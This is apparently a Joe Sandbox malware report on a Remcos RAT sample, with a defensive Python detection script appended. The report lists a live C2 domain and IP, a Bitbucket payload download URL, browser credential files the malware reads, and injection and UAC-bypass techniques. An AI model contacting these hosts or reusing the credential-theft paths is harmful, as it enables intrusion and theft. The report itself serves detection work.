Source: Yara match | File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0292B21B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data19_2_0294B21B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db19_2_0294B335

              Remote Access Functionality

Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe6_2_02925042
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe19_2_02945042
MITRE ATT&CK Matrix (a number in front of a technique is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 Valid Accounts | 1 Bypass User Account Control | 1 Deobfuscate/Decode Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 111 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Windows Service | 1 Valid Accounts | 2 Obfuscated Files or Information | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 11 Access Token Manipulation | 1 Timestomp | NTDS | 1 System Network Connections Discovery | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Windows Service | 1 DLL Side-Loading | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 321 Process Injection | 1 Bypass User Account Control | Cached Domain Credentials | 45 System Information Discovery | VNC | GUI Input Capture | 113 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 File Deletion | DCSync | 241 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 221 Masquerading | Proc Filesystem | 2 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Valid Accounts | /etc/passwd and /etc/shadow | 1 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 2 Virtualization/Sandbox Evasion | Network Sniffing | 1 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Access Token Manipulation | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 321 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1569880 | Sample: jW3NEKvxH1.exe | Startdate: 06/12/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: zara.master-workdone.com.ua; manazara.master-workdone.com.ua; 4 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
  Started: jW3NEKvxH1.exe 1 6 (node 9); Dlaybpxl.PIF (node 14); Dlaybpxl.PIF (node 16)
jW3NEKvxH1.exe 1 6 (node 9)
  DNS/IP: s3-w.us-east-1.amazonaws.com 3.5.30.3, 443, 49718 AMAZON-AESUS United States; bitbucket.org 185.166.143.50, 443, 49715, 49716 AMAZON-02US Germany
  Dropped: C:\Users\Public\Libraries\lxpbyalD.cmd (DOS); C:\Users\Public\Libraries\Dlaybpxl (data); C:\Users\Public\Dlaybpxl.url (MS)
  Signatures: Early bird code injection technique detected; Allocates memory in foreign processes; Queues an APC in another process (thread injection); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  Started: SndVol.exe 3 (node 18); cmd.exe 1 (node 22); esentutl.exe 2 (node 24)
Dlaybpxl.PIF (node 14)
  Signatures: Multi AV Scanner detection for dropped file
  Started: SndVol.exe (node 27)
Dlaybpxl.PIF (node 16)
  Started: colorcpl.exe (node 29)
SndVol.exe 3 (node 18)
  DNS/IP: zara.master-workdone.com.ua 104.243.42.254, 49730, 49785, 49856 RELIABLESITEUS United States
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 4 other signatures
cmd.exe 1 (node 22)
  Started: esentutl.exe 2 (node 31); alpha.pif 1 (node 35); esentutl.exe 2 (node 37); 6 other processes
esentutl.exe 2 (node 24)
  Dropped: C:\Users\Public\Libraries\Dlaybpxl.PIF (PE32)
  Started: conhost.exe (node 39)
esentutl.exe 2 (node 31)
  Dropped: C:\Users\Public\alpha.pif (PE32)
  Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
alpha.pif 1 (node 35)
  Started: xpha.pif 1 (node 43)
esentutl.exe 2 (node 37)
  Dropped: C:\Users\Public\xpha.pif (PE32)
xpha.pif 1 (node 43)
  DNS/IP: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
jW3NEKvxH1.exe | 55% | ReversingLabs | Win32.Trojan.Remcos |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Dlaybpxl.PIF | 55% | ReversingLabs | Win32.Trojan.Remcos |
C:\Users\Public\alpha.pif | 0% | ReversingLabs | |
C:\Users\Public\xpha.pif | 0% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
manazara.master-workdone.com.ua | 0% | Avira URL Cloud | safe |
zara.master-workdone.com.ua | 0% | Avira URL Cloud | safe |
http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe |
http://www.pmail.com | 0% | Avira URL Cloud | safe |
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 3.5.30.3 | true | false | | high
bitbucket.org | 185.166.143.50 | true | false | | high
manazara.master-workdone.com.ua | 104.243.42.254 | true | true | | unknown
zara.master-workdone.com.ua | 104.243.42.254 | true | true | | unknown
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke | false | | high
manazara.master-workdone.com.ua | true | Avira URL Cloud: safe | unknown
zara.master-workdone.com.ua | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://bitbucket.org/ | jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000819000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sectigo.com/CPS0 | jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://ocsp.sectigo.com0 | jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website | jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://bitbucket.org/masterservicwes/ma | jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020B1D000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                  https://dz8aopenkvv6s.cloudfront.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-6jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://geoplugin.net/json.gpSndVol.exefalse
                                                        high
                                                        http://geoplugin.net/json.gp/CjW3NEKvxH1.exe, 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, SndVol.exe, 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          high
                                                          https://remote-app-switcher.prod-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.cookielaw.org/jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aui-cdn.atlassian.com/jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netjW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.pmail.comjW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://bbuseruploads.s3.amazonaws.com/jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ocsp.sectigo.com0CjW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.243.42.254 | manazara.master-workdone.com.ua | United States | 23470 | RELIABLESITEUS | true
185.166.143.50 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
3.5.30.3 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
                                                                          IP
                                                                          127.0.0.1
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1569880
                                                                          Start date and time:2024-12-06 11:03:38 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 11m 1s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:33
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:jW3NEKvxH1.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:e4696be1368f7ac260c605c7b4f7eeaf.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@34/10@4/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 99%
                                                                          • Number of executed functions: 71
                                                                          • Number of non-executed functions: 214
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: jW3NEKvxH1.exe
Time | Type | Description
05:04:33 | API Interceptor | 2x Sleep call for process: jW3NEKvxH1.exe modified
05:04:57 | API Interceptor | 2x Sleep call for process: Dlaybpxl.PIF modified
05:05:21 | API Interceptor | 3143733x Sleep call for process: SndVol.exe modified
11:04:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dlaybpxl C:\Users\Public\Dlaybpxl.url
11:04:56 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dlaybpxl C:\Users\Public\Dlaybpxl.url
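The indicators worth sweeping an estate for are the ones above: the single host/IP pair the sandbox marked malicious in the IP table (manazara.master-workdone.com.ua, 104.243.42.254), the geoplugin.net/json.gp lookups made from SndVol.exe and colorcpl.exe in the URL table, and the Run-key autostart pointing at C:\Users\Public\Dlaybpxl.url in the timeline. What follows is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: a small Python hunt that applies those indicators to Sysmon-style events. The event records are constructed for the example; the on-disk path of Dlaybpxl.PIF, the SndVol.exe path and the user SID are assumptions. The geoplugin.net rule deliberately keys on the requesting process rather than the domain, because the service itself is legitimate and browsers resolve it routinely.

```python
"""Triage hunt for this report's indicators over Sysmon-style events.

Added example, not part of the Joe Sandbox report. Indicators are copied
from the report's IP/domain table, URL table and timeline; the event records
at the bottom are constructed to mimic Sysmon fields and are not real telemetry.
"""
import re
from pathlib import PureWindowsPath

# IP/domain table: the only host the sandbox marked malicious (Remcos C2).
C2_HOSTS = {"manazara.master-workdone.com.ua", "104.243.42.254"}

# URL table: geoplugin.net/json.gp was requested from SndVol.exe and
# colorcpl.exe. The service is legitimate; Remcos uses it to geolocate the
# victim, so the rule keys on "lookup from a non-browser process".
GEOIP_HOST = "geoplugin.net"
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}

# Timeline: HKCU\...\CurrentVersion\Run\Dlaybpxl -> C:\Users\Public\Dlaybpxl.url
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
WORLD_WRITABLE_DIRS = ("c:\\users\\public\\",)          # extend per estate (assumption)
LAUNCHER_EXTENSIONS = {".url", ".pif", ".cmd", ".bat", ".vbs", ".js"}


def basename_lower(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def suspicious_target(path: str) -> bool:
    """True when a path sits in a world-writable folder or ends in a
    non-EXE launcher extension (the .url / .PIF pattern this sample uses)."""
    p = path.strip('"').lower()
    return p.startswith(WORLD_WRITABLE_DIRS) or PureWindowsPath(p).suffix in LAUNCHER_EXTENSIONS


def hunt(events):
    """Return (rule, image, detail) tuples for matching events.

    Handled Sysmon IDs: 1 process create, 3 network connect,
    13 registry value set, 22 DNS query. Events are dicts of Sysmon fields."""
    findings = []
    for ev in events:
        eid, image = ev["EventID"], ev.get("Image", "")
        if eid == 22:
            q = ev["QueryName"].lower()
            if q in C2_HOSTS:
                findings.append(("remcos_c2_dns", image, q))
            elif q == GEOIP_HOST and basename_lower(image) not in BROWSERS:
                findings.append(("geoip_lookup_nonbrowser", image, q))
        elif eid == 3 and ev["DestinationIp"] in C2_HOSTS:
            findings.append(("remcos_c2_connect", image, ev["DestinationIp"]))
        elif eid == 13 and RUN_KEY_RE.search(ev["TargetObject"]) and suspicious_target(ev["Details"]):
            findings.append(("run_key_to_suspicious_path", image, ev["Details"]))
        elif eid == 1 and suspicious_target(image):
            findings.append(("exec_from_suspicious_folder", image, ev.get("CommandLine", "")))
    return findings


# Constructed events modelled on the report's timeline and network tables.
# The Dlaybpxl.PIF path, the SndVol.exe path and the user SID are assumed.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\Public\Dlaybpxl.PIF",
     "CommandLine": r"C:\Users\Public\Dlaybpxl.PIF"},
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\jW3NEKvxH1.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                     r"\Software\Microsoft\Windows\CurrentVersion\Run\Dlaybpxl",
     "Details": r"C:\Users\Public\Dlaybpxl.url"},
    # Staging host from the report, reputation "high": no finding.
    {"EventID": 22, "Image": r"C:\Users\user\Desktop\jW3NEKvxH1.exe", "QueryName": "bitbucket.org"},
    {"EventID": 22, "Image": r"C:\Windows\System32\SndVol.exe", "QueryName": "geoplugin.net"},
    {"EventID": 22, "Image": r"C:\Windows\System32\SndVol.exe",
     "QueryName": "manazara.master-workdone.com.ua"},
    {"EventID": 3, "Image": r"C:\Windows\System32\SndVol.exe", "DestinationIp": "104.243.42.254"},
    # The same lookup from a browser is ordinary web traffic: no finding.
    {"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "geoplugin.net"},
]

if __name__ == "__main__":
    for rule, image, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:28} {image}  {detail}")
```

Run against the constructed events, the hunt reports the .PIF executing from C:\Users\Public, the Run value pointing at the .url file, the geolocation lookup and the C2 resolution and connection from SndVol.exe, and stays silent on the bitbucket.org download and on the browser's geoplugin.net query. Feeding it real Sysmon exports means mapping your event fields onto the same keys; the rules themselves do not depend on the sandbox.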
Match | Associated Sample Name / URL | Detection | Threat Name
185.166.143.50 | yG53aU3gGm.exe | malicious | Unknown
185.166.143.50 | yG53aU3gGm.exe | malicious | Unknown
185.166.143.50 | lnvoice-1620804301.pdf (1).js | malicious | RHADAMANTHYS
185.166.143.50 | ft.exe | malicious | LummaC Stealer
185.166.143.50 | invoice-1664809283.pdf (1).js | malicious | RHADAMANTHYS
185.166.143.50 | https://getgreenshot.org | malicious | Unknown
185.166.143.50 | qqig1mHX8U.exe | malicious | AveMaria, DBatLoader, UACMe
185.166.143.50 | 3o2WdGwcLF.vbs | malicious | Unknown
185.166.143.50 | 0a0#U00a0.js | malicious | RHADAMANTHYS
185.166.143.50 | https://t.ly/SjDNX | malicious | Python Stealer, Braodo
3.5.30.3 | https://globalmalls.network/ | malicious | Unknown
3.5.30.3 | http://kw.tikto6kbx.com/ | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
bitbucket.org | yG53aU3gGm.exe | malicious | Unknown | 185.166.143.50
bitbucket.org | yG53aU3gGm.exe | malicious | Unknown | 185.166.143.50
bitbucket.org | lnvoice-1620804301.pdf .js | malicious | RHADAMANTHYS | 185.166.143.48
bitbucket.org | lnvoice-1620804301.pdf (1).js | malicious | RHADAMANTHYS | 185.166.143.50
bitbucket.org | ft.exe | malicious | LummaC Stealer | 185.166.143.50
bitbucket.org | https://bitbucket.org/ziphose/obmen/downloads/Doc.7z | malicious | RMSRemoteAdmin | 185.166.143.49
bitbucket.org | invoice-6483728493.pdf .js | malicious | RHADAMANTHYS | 185.166.143.49
bitbucket.org | invoice-1664809283.pdf (1).js | malicious | RHADAMANTHYS | 185.166.143.50
bitbucket.org | invoice-1664809283.pdf .js | malicious | RHADAMANTHYS | 185.166.143.48
